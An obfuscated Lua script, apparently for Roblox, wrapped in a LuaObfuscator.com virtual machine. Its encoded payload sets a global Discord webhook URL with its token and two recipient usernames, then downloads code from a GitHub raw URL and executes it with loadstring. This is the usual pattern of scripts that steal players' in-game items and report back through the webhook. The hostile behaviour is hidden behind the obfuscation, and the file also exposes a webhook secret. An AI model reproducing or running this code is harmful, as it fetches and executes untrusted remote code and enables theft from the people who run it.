--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v75=0;local v76;while true do if (v75==1) then return v76;end if (v75==0) then v76=v5(v68,v19);v19=nil;v75=1;end end else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=0 + 0 + 0 ;local v70;while true do if (v69==0) then v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (1 -0))) ;return v70-(v70%(932 -((1814 -(892 + 65)) + 74))) ;end end else local v71=(570 -(367 + (479 -278)))^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (0 + (0 -0)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==((1395 -1044) -(87 + 263))) then return (v37 * (436 -(67 + 113))) + v36 ;end if (v35==(0 + (952 -(802 + 150)))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;v35=1 + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + ((16 -10) -2) ;return (v41 * (12211951 + 4565265)) + (v40 * (66533 -(915 + 82))) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1 -0 ,1506 -(998 + 488) ) * ((1189 -((3622 -2553) + (558 -440)))^(27 + 5))) + v42 ;local v46=v20(v43,(19 + 28) -26 ,(230 -163) -36 );local v47=((v20(v43,6 + 26 )==(1 -0)) and  -(1 + 0)) or (792 -(368 + 423)) ;if (v46==(0 -0)) then if (v45==(18 -((1757 -(760 + 987)) + 8))) then return v47 * (0 -0) ;else v46=443 -((2329 -(1789 + 124)) + 26) ;v44=0 -0 ;end elseif (v46==(5043 -(3762 -(745 + 21)))) then return ((v45==(0 + 0)) and (v47 * ((1 + 0 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((4999 -3182) -794) ) * (v44 + (v45/((1082 -(1020 + 60))^(1475 -(630 + (3110 -2317)))))) ;end local function v25(v48)local v49=0 + (0 -0) ;local v50;local v51;while true do if (v49==(3 + 0)) then return v6(v51);end if (v49==(1057 -(87 + 968))) then v51={};for v77=4 -3 , #v50 do v51[v77]=v2(v1(v3(v50,v77,v77)));end v49=3;end if (v49==(0 -0)) then v50=nil;if  not v48 then local v93=0 + 0 ;while true do if (v93==(0 -0)) then v48=v23();if (v48==(1413 -(447 + 966))) then return "";end break;end end end v49=2 -1 ;end if (v49==((520 + 1298) -(1703 + 114))) then v50=v3(v16,v18,(v18 + v48) -(702 -(376 + 325)) );v18=v18 + v48 ;v49=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (1==v52) then v55=nil;v56=nil;v52=5 -3 ;end if (v52==3) then v59=nil;v60=nil;v52=4 + 0 ;end if (v52==(1935 -(565 + 1368))) then v57=nil;v58=nil;v52=1 + 2 ;end if (v52~=(0 + 0)) then else v53=1171 -(418 + 753) ;v54=nil;v52=1 + 0 ;end if (v52==4) then while true do if (v53~=(1 + 1)) then else local v97=0 + 0 ;while true do if ((0 + 0)~=v97) then else v58=nil;v59=nil;v97=857 -(564 + 292) ;end if (v97==(530 -(406 + 123))) then v53=3;break;end end end if (v53==(2 -1)) then local v98=0;while true do if (v98~=(304 -(244 + 60))) then else v56=nil;v57=nil;v98=1770 -(1749 + 20) ;end if (v98~=1) then else v53=2;break;end end end if (v53==(1 + 2)) then v60=nil;while true do local v100=1322 -(1249 + 73) ;local v101;while true do if (v100==(0 + 0)) then v101=0;while true do if (v101~=(1146 -(466 + 679))) then else if (v54==(1003 -(938 + 63))) then local v121=0;local v122;while true do if ((0 -0)==v121) then v122=0 -0 ;while true do if (v122==(1901 -(106 + 1794))) then for v176=1,v23() do local v177=0;local v178;while true do if ((0 + 0)==v177) then v178=v21();if (v20(v178,1 + 0 ,1 + 0 )~=(0 -0)) then else local v189=0 -0 ;local v190;local v191;local v192;local v193;while true do if (v189~=(268 -(176 + 91))) then else local v197=114 -(4 + 110) ;while true do if ((584 -(57 + 527))~=v197) then else v192=nil;v193=nil;v197=1428 -(41 + 1386) ;end if (v197==(104 -(17 + 86))) then v189=2 + 0 ;break;end end end if (v189~=(3 -1)) then else while true do if (v190==(2 -1)) then local v202=0 -0 ;while true do if (v202~=(167 -(122 + 44))) then else v190=2;break;end if (v202~=(0 -0)) then else local v212=0;while true do if (v212==(0 -0)) then v193={v22(),v22(),nil,nil};if (v191==(0 -0)) then local v214=65 -(30 + 35) ;local v215;while true do if (v214==0) then v215=0;while true do if (v215~=(0 -0)) then else v193[7 -4 ]=v22();v193[3 + 1 ]=v22();break;end end break;end end elseif (v191==(612 -(602 + 9))) then v193[3]=v23();elseif (v191==(1191 -(449 + 740))) then v193[875 -(826 + 46) ]=v23() -((949 -(245 + 702))^(50 -34)) ;elseif (v191~=(1 + 2)) then else local v226=0;local v227;local v228;local v229;while true do if ((1899 -(260 + 1638))~=v226) then else v229=nil;while true do if (v227==0) then v228=440 -(382 + 58) ;v229=nil;v227=1258 -(1043 + 214) ;end if (v227==1) then while true do if (0==v228) then v229=0;while true do if ((0 -0)==v229) then v193[11 -8 ]=v23() -(2^(1228 -(323 + 889))) ;v193[11 -7 ]=v22();break;end end break;end end break;end end break;end if (v226==(0 -0)) then v227=1205 -(902 + 303) ;v228=nil;v226=1 -0 ;end end end v212=1;end if (v212==(581 -(361 + 219))) then v202=1;break;end end end end end if (v190==3) then if (v20(v192,6 -3 ,3)==(321 -(53 + 267))) then v193[1694 -(1121 + 569) ]=v60[v193[218 -(22 + 192) ]];end v55[v176]=v193;break;end if (v190~=0) then else local v204=0 + 0 ;local v205;local v206;while true do if (v204==(414 -(15 + 398))) then while true do if (v205==(0 -0)) then v206=982 -(18 + 964) ;while true do if (1==v206) then v190=1 -0 ;break;end if ((765 -(468 + 297))~=v206) then else local v216=0;local v217;while true do if (v216~=0) then else v217=562 -(334 + 228) ;while true do if (v217==(3 -2)) then v206=2 -1 ;break;end if (v217==(0 -0)) then v191=v20(v178,1 + 1 ,239 -(141 + 95) );v192=v20(v178,14 -10 ,4 + 2 );v217=1 + 0 ;end end break;end end end end break;end end break;end if (v204==(850 -(20 + 830))) then v205=0 + 0 ;v206=nil;v204=127 -(116 + 10) ;end end end if (v190==(1 + 1)) then local v207=738 -(542 + 196) ;local v208;while true do if (v207~=0) then else v208=0 -0 ;while true do if (v208==(1 -0)) then v190=1 + 2 ;break;end if (v208~=(0 + 0)) then else local v213=0 + 0 ;while true do if (v213~=(0 -0)) then else if (v20(v192,2 -1 ,1552 -(1126 + 425) )==1) then v193[407 -(118 + 287) ]=v60[v193[2]];end if (v20(v192,7 -5 ,2)==(1122 -(118 + 1003))) then v193[3]=v60[v193[3]];end v213=1 -0 ;end if (v213==(766 -(574 + 191))) then v208=2 -1 ;break;end end end end break;end end end end break;end if (v189~=(377 -(142 + 235))) then else v190=0;v191=nil;v189=4 -3 ;end end end break;end end end v54=2 + 1 ;break;end if ((0 + 0)==v122) then for v179=978 -(553 + 424) ,v59 do local v180=0 -0 ;local v181;local v182;local v183;local v184;while true do if (v180~=(0 -0)) then else v181=0;v182=nil;v180=1 + 0 ;end if (v180==1) then v183=nil;v184=nil;v180=1792 -(573 + 1217) ;end if (v180==(5 -3)) then while true do if (v181==(0 + 0)) then local v196=0;while true do if (v196~=0) then else v182=0 + 0 ;v183=nil;v196=1;end if (v196==1) then v181=1;break;end end end if (v181~=1) then else v184=nil;while true do if (v182==(0 + 0)) then local v200=0 + 0 ;while true do if (v200==(1 + 0)) then v182=1;break;end if (v200~=(0 -0)) then else local v209=0 -0 ;while true do if (v209==(2 -1)) then v200=2 -1 ;break;end if (v209~=(806 -(118 + 688))) then else v183=v21();v184=nil;v209=1;end end end end end if ((49 -(25 + 23))~=v182) then else if (v183==(1 + 0)) then v184=v21()~=(1886 -(927 + 959)) ;elseif (v183==2) then v184=v24();elseif (v183~=(1 + 2)) then else v184=v25();end v60[v179]=v184;break;end end break;end end break;end end end v58[14 -11 ]=v21();v122=1;end end break;end end end if (v54==(735 -(16 + 716))) then local v123=0;local v124;while true do if (v123==0) then v124=753 -(239 + 514) ;while true do if (v124==(0 -0)) then local v171=0 + 0 ;while true do if (v171==(1329 -(797 + 532))) then for v187=286 -(175 + 110) ,v23() do v56[v187-(2 -1) ]=v28();end return v58;end end end end break;end end end break;end if (v101==(0 + 0)) then local v106=0 + 0 ;local v107;while true do if (v106~=(0 -0)) then else v107=1202 -(373 + 829) ;while true do if (v107==(1061 -(810 + 251))) then if (v54~=(1 + 0)) then else local v172=731 -(476 + 255) ;local v173;while true do if ((1130 -(369 + 761))~=v172) then else v173=0 + 0 ;while true do if (v173==(1 -0)) then v60={};v54=2 + 0 ;break;end if (v173==(0 -0)) then local v194=533 -(43 + 490) ;while true do if (v194==(734 -(711 + 22))) then v173=1;break;end if (v194==(238 -(64 + 174))) then local v198=0;while true do if (v198==0) then v58={v55,v56,nil,v57};v59=v23();v198=1;end if (v198~=(1 -0)) then else v194=1 + 0 ;break;end end end end end end break;end end end if (v54==(1744 -(1344 + 400))) then local v174=405 -(255 + 150) ;local v175;while true do if (v174==(336 -(144 + 192))) then v175=0;while true do if (v175~=0) then else local v195=216 -(42 + 174) ;while true do if (v195==0) then local v199=0 + 0 ;while true do if (v199~=(3 -2)) then else v195=1 + 0 ;break;end if (v199==(0 + 0)) then v55={};v56={};v199=1;end end end if (v195==(407 -(183 + 223))) then v175=1505 -(363 + 1141) ;break;end end end if (v175==(1 + 0)) then v57={};v54=1581 -(1183 + 397) ;break;end end break;end end end v107=2 -1 ;end if (v107==(338 -(10 + 327))) then v101=1 + 0 ;break;end end break;end end end end break;end end end break;end if (v53==(0 + 0)) then local v99=338 -(118 + 220) ;while true do if (v99==(1 + 0)) then v53=1 + 0 ;break;end if (v99~=(449 -(108 + 341))) then else v54=1975 -(1913 + 62) ;v55=nil;v99=1;end end end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92>0) then do return;end elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=2) then local v108=v91[2];v89[v108]=v89[v108](v13(v89,v108 + 1 ,v84));elseif (v92>3) then v89[v91[2]]=v91[3];else v89[v91[2]]();end elseif (v92<=7) then if (v92<=5) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92>6) then v83=v91[3];else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=8) then v89[v91[2]]();elseif (v92>9) then v89[v91[2]]=v91[3];else v89[v91[2]]=v63[v91[3]];end elseif (v92<=15) then if (v92<=12) then if (v92>11) then v89[v91[2]][v91[3]]=v91[4];else local v112=0;local v113;local v114;while true do if (v112==1) then v89[v113 + 1 ]=v114;v89[v113]=v114[v91[4]];break;end if (v112==0) then v113=v91[2];v114=v89[v91[3]];v112=1;end end end elseif (v92<=13) then local v115=0;local v116;local v117;local v118;local v119;while true do if (1==v115) then v84=(v118 + v116) -1 ;v119=0;v115=2;end if (0==v115) then v116=v91[2];v117,v118=v82(v89[v116](v13(v89,v116 + 1 ,v91[3])));v115=1;end if (v115==2) then for v156=v116,v84 do local v157=0;while true do if (0==v157) then v119=v119 + 1 ;v89[v156]=v117[v119];break;end end end break;end end elseif (v92>14) then local v136=0;local v137;local v138;while true do if (0==v136) then v137=v91[2];v138=v89[v91[3]];v136=1;end if (v136==1) then v89[v137 + 1 ]=v138;v89[v137]=v138[v91[4]];break;end end else v83=v91[3];end elseif (v92<=18) then if (v92<=16) then v89[v91[2]]=v91[3]~=0 ;elseif (v92>17) then v89[v91[2]]=v63[v91[3]];else local v142=0;local v143;while true do if (v142==0) then v143=v91[2];v89[v143]=v89[v143](v13(v89,v143 + 1 ,v84));break;end end end elseif (v92<=19) then do return;end elseif (v92==20) then local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==1) then v84=(v147 + v145) -1 ;v148=0;v144=2;end if (0==v144) then v145=v91[2];v146,v147=v82(v89[v145](v13(v89,v145 + 1 ,v91[3])));v144=1;end if (v144==2) then for v166=v145,v84 do local v167=0;while true do if (v167==0) then v148=v148 + 1 ;v89[v166]=v146[v148];break;end end end break;end end else v89[v91[2]]=v91[3]~=0 ;end v83=v83 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O32353132363831392O382O30363031382F355F6D737035652D545F7A305F6E2O4448707A4352532O4F685447674C664745326554732O5675416C68656836793679356D425462673644686445633949457964463236030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030E3O00547279546F52656163683O395403093O00557365724E616D653200173O0012043O00013O00264O000E0001000200040E3O000E0001001209000100033O00300C000100040005001209000100063O001209000200073O00200F000200020008001204000400094O0015000500014O0014000200054O000200013O00022O000300010001000100040E3O0016000100264O00010001000100040E3O00010001001209000100033O00300C0001000A000B001209000100033O00300C0001000C000B0012043O00023O00040E3O000100012O00133O00017O00",v9(),...);end
